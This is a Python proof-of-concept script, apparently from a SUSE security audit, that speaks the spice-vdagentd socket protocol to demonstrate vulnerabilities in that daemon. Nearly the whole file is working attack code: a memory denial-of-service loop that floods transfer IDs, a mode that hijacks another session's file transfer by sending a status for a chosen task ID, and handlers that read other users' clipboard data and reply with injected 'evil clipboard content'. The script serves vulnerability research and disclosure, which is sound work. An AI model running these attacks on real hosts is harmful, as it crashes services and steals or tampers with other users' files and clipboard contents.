#!/usr/bin/python3 -u
# -*- coding: utf-8 -*-
# vim: ts=4 et sw=4 sts=4 :

# Author: Matthias Gerstner <matthias.gerstner@suse.com>
#
# Small testing tool to experiment with the spice-vdagentd protocol and to
# demonstrate security issues in the spice-vdagentd implementation.
#
# You need a fairly recent Python3 interpreter and python3-pyinotify package
# to run this script. The latter only for the `--wait-for-file-create`
# feature.
#
# All of this source code is licensed under:
#
# ISC License
#
# Copyright (c) 2020, SUSE LLC
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.

import os, sys, socket
import argparse
import binascii
import copy
import functools
import struct
from enum import Enum

parser = argparse.ArgumentParser(description = "Program to interact with spice-vdagentd and reproduce security issues")
parser.add_argument("--xfer-status-DoS", help="Perform a memory DoS against vdagentd by entering endless tansfer IDs into its active_xfers hashmap", action='store_true')
parser.add_argument("--socket-fd", help="Reuse the inherited file descriptor number to talk to the vdagentd", type=int, default = None)
parser.add_argument("--send-xfer-status", type=int, help="Indicate to the vdagentd that we're ready to receive file data for the given transfer ID")
parser.add_argument("--wait-for-file-create", type=str, help="Before sending xfer-status, wait for a file to be created in the given directory")

args = parser.parse_args()

class MessageType(Enum):
    GUEST_XORG_RESOLUTION = 0
    MONITORS_CONFIG = 1
    CLIPBOARD_GRAB = 2
    CLIPBOARD_REQUEST = 3
    CLIPBOARD_DATA = 4
    CLIPBOARD_RELEASE = 5
    VERSION = 6
    AUDIO_VOLUME_SYNC = 7
    FILE_XFER_START = 8
    FILE_XFER_STATUS = 9
    FILE_XFER_DATA = 10
    FILE_XFER_DISABLE = 11
    CLIENT_DISCONNECTED = 12
    GRAPHICS_DEVICE_INFO = 13
    NO_MESSAGES = 14


# NOTE: this enum is found in the spice-protocol package
class XferStatus(Enum):
    FILE_XFER_STATUS_CAN_SEND_DATA = 0
    FILE_XFER_STATUS_CANCELLED = 1
    FILE_XFER_STATUS_ERROR = 2
    FILE_XFER_STATUS_SUCCESS = 3
    FILE_XFER_STATUS_NOT_ENOUGH_SPACE = 4
    FILE_XFER_STATUS_SESSION_LOCKED = 5
    FILE_XFER_STATUS_VDAGENT_NOT_CONNECTED = 6
    FILE_XFER_STATUS_DISABLED = 7


class ClipboardType(Enum):
    SELECTION_CLIPBOARD = 0
    SELECTION_PRIMARY = 1
    SELECTION_SECONDARY = 2


class ClipboardDataType(Enum):
    NONE = 0
    UTF8_TEXT = 1
    IMAGE_PNG = 2
    IMAGE_BMP = 3
    IMAGE_TIFF = 4
    IMAGE_JPG = 5


class Header:

    def __init__(self, kind, arg1, arg2, length):

        self.kind = kind
        self.arg1 = arg1
        self.arg2 = arg2
        self.length = length


# see `udscd_message_header` in vdagentd.
# arg1 and arg2 are variable arguments sometimes used by specific messages
# length denotes the follow-up custom data in bytes
def buildHeader(kind, arg1, arg2, length):
    ret = struct.pack("I", int(kind))
    ret += struct.pack("I", arg1)
    ret += struct.pack("I", arg2)
    ret += struct.pack("I", length)
    #print("Header:", binascii.hexlify(ret))
    return ret


def sendResolution(s, width = 1024, height = 768):
    print("sending resolution of", width, height)
    packet = buildHeader(MessageType.GUEST_XORG_RESOLUTION.value, width, height, 20)

    # width, height, x, y, display_id
    for num in (width, height, 0, 0, 0):
        packet += struct.pack("I", num)

    s.send(packet)


def sendGrabClipboard(s, which):
    print("sending clipboard grab request for", which)
    packet = buildHeader(MessageType.CLIPBOARD_GRAB.value, int(which.value), 0, 4)

    # we also need to announce the supported clipboard types we have
    packet += struct.pack("I", int(ClipboardDataType.UTF8_TEXT.value))

    s.send(packet)


def sendClipboardRequest(s, which):
    print("sending clipboard request for", which)
    packet = buildHeader(MessageType.CLIPBOARD_REQUEST.value, int(which.value), int(ClipboardDataType.UTF8_TEXT.value), 0)

    s.send(packet)


def sendClipboardData(s, which, data):
    print("setting clipboard data for", which, "to", data)
    packet = buildHeader(MessageType.CLIPBOARD_DATA.value, int(which.value), int(ClipboardDataType.UTF8_TEXT.value), len(data))

    for ch in data:
        packet += struct.pack("c", bytes(ch.encode()))

    s.send(packet)


def sendXferStatus(s, code, task, verbose = True):
    if verbose:
        print("Sending xfer status", code, "for task", task)
    packet = buildHeader(MessageType.FILE_XFER_STATUS.value, task, int(code.value), 0)

    s.send(packet)


def receiveMessage(s):
    header = s.recv(16)
    if not header:
        return None
    if len(header) != 16:
        print("short read of", len(header), "!")
        return None

    kind = struct.unpack_from("I", header)[0]
    kind = MessageType(kind)
    arg1 = struct.unpack_from("I", header, 4)[0]
    arg2 = struct.unpack_from("I", header, 8)[0]
    length = struct.unpack_from("I", header, 12)[0]

    header = Header(kind, arg1, arg2, length)

    if length:
        data = s.recv(length)
        if len(data) != length:
            print("short read of", len(data), "!")
            return None
    else:
        data = bytes()

    return header, data


# sends out initial messages after the first incoming message from the daemon
# arrived
def sendStartMessages(s):
    sendResolution(s)


def printMessage(header, data):
    print(header.kind, "arg1 =", header.arg1, "arg2 =", header.arg2, "bytes =", header.length)
    # don't print data for file transfer chunks, this clutters the terminal
    # and processXferData prints the decoded content already
    if header.length and not header.kind == MessageType.FILE_XFER_DATA:
        print(binascii.hexlify(data))


def processClipboardGrab(header, data):
    data = copy.deepcopy(data)
    while data:
        supp = struct.unpack_from("I", data[0:4])[0]
        supp = ClipboardDataType(supp)
        print("supported type:", supp)
        data = data[4:]


def processXferStart(header, data):
    # the data represents a spice-protocol VDAgentFileXferDataMessage
    # structure:
    #
    # uint32_t id;
    # uint8_t data[0]
    #
    # the id is the task_id used in vdagentd to keep track of in the
    # active_xfers hash table
    #
    # data is a glib keyfile "ini style" configuration file
    task_id = struct.unpack_from("I", data, 0)[0]
    config = data[4:]

    print("File transfer with task ID", task_id)
    print("Configuration settings:")
    print(config.decode('utf8'))


def processXferData(header, data):
    # data is simply a chunk of the file
    print("data chunk content:")
    # this only works for text files, not binary data, obviously
    print(data.decode('utf8'))


def waitForFileCreate(path):
    import pyinotify

    wm = pyinotify.WatchManager()

    class EventHandler(pyinotify.ProcessEvent):

        got_event = False

        def process_IN_CREATE(self, event):
            print(event.pathname, "got created")
            EventHandler.got_event = True

    def stopLoop(notifier):
        return EventHandler.got_event

    handler = EventHandler()
    notifier = pyinotify.Notifier(wm, handler)
    watch = wm.add_watch(path, pyinotify.IN_CREATE)
    print("Waiting for file creation in", path)
    # getting the loop to stop is awkwardly complex, calling notifier.stop()
    # from within the event handling causes a NoneType access in pyinotify. So
    # let's do it the stupid way.
    notifier.loop(callback = stopLoop)


def createSocket():
    socket_create = socket.socket
    if args.socket_fd:
        socket_create = functools.partial(socket_create, fileno = args.socket_fd)
        print("Using existing connected socket file descriptor")

    s = socket_create(socket.AF_UNIX, socket.SOCK_STREAM, 0)
    if not args.socket_fd:
        s.connect( "/run/spice-vdagentd/spice-vdagent-sock" )

    return s


s = createSocket()

if args.xfer_status_DoS:
    for task in range((2**64) - 1):
        verbose = (task % 500000) == 0
        sendXferStatus(s, XferStatus.FILE_XFER_STATUS_CAN_SEND_DATA, task, verbose)
    sys.exit(0)

if args.wait_for_file_create:
    waitForFileCreate(args.wait_for_file_create)
if args.send_xfer_status:
    sendXferStatus(s, XferStatus.FILE_XFER_STATUS_CAN_SEND_DATA, args.send_xfer_status)

while True:
    ret = receiveMessage(s)
    if not ret:
        print("Received EOF")
        break
    header, data = ret

    printMessage(header, data)

    if header.kind == MessageType.VERSION:
        sendStartMessages(s)
    elif header.kind == MessageType.CLIPBOARD_GRAB:
        processClipboardGrab(header, data)
        clipboard_type = ClipboardType(header.arg1)
        sendClipboardRequest(s, clipboard_type)
    elif header.kind == MessageType.CLIPBOARD_RELEASE:
        clipboard_type = ClipboardType(header.arg1)
        sendGrabClipboard(s, clipboard_type)
    elif header.kind == MessageType.FILE_XFER_START:
        processXferStart(header, data)
    elif header.kind == MessageType.FILE_XFER_DATA:
        processXferData(header, data)
    elif header.kind == MessageType.CLIPBOARD_DATA:
        clipboard_type = ClipboardType(header.arg1)
        clipboard_data_type = ClipboardDataType(header.arg2)
        print()
        print("Received clipboard data for", clipboard_type, "as", clipboard_data_type)
        if clipboard_data_type == ClipboardDataType.UTF8_TEXT:
            print("Content:", data.decode('utf8'))
        print()
    elif header.kind == MessageType.CLIPBOARD_REQUEST:
        print()
        clipboard_type = ClipboardType(header.arg1)
        clipboard_data_type = ClipboardDataType(header.arg2)
        print("Received clipboard request for", clipboard_type, "as", clipboard_data_type)
        sendClipboardData(s, clipboard_type, "evil clipboard content")

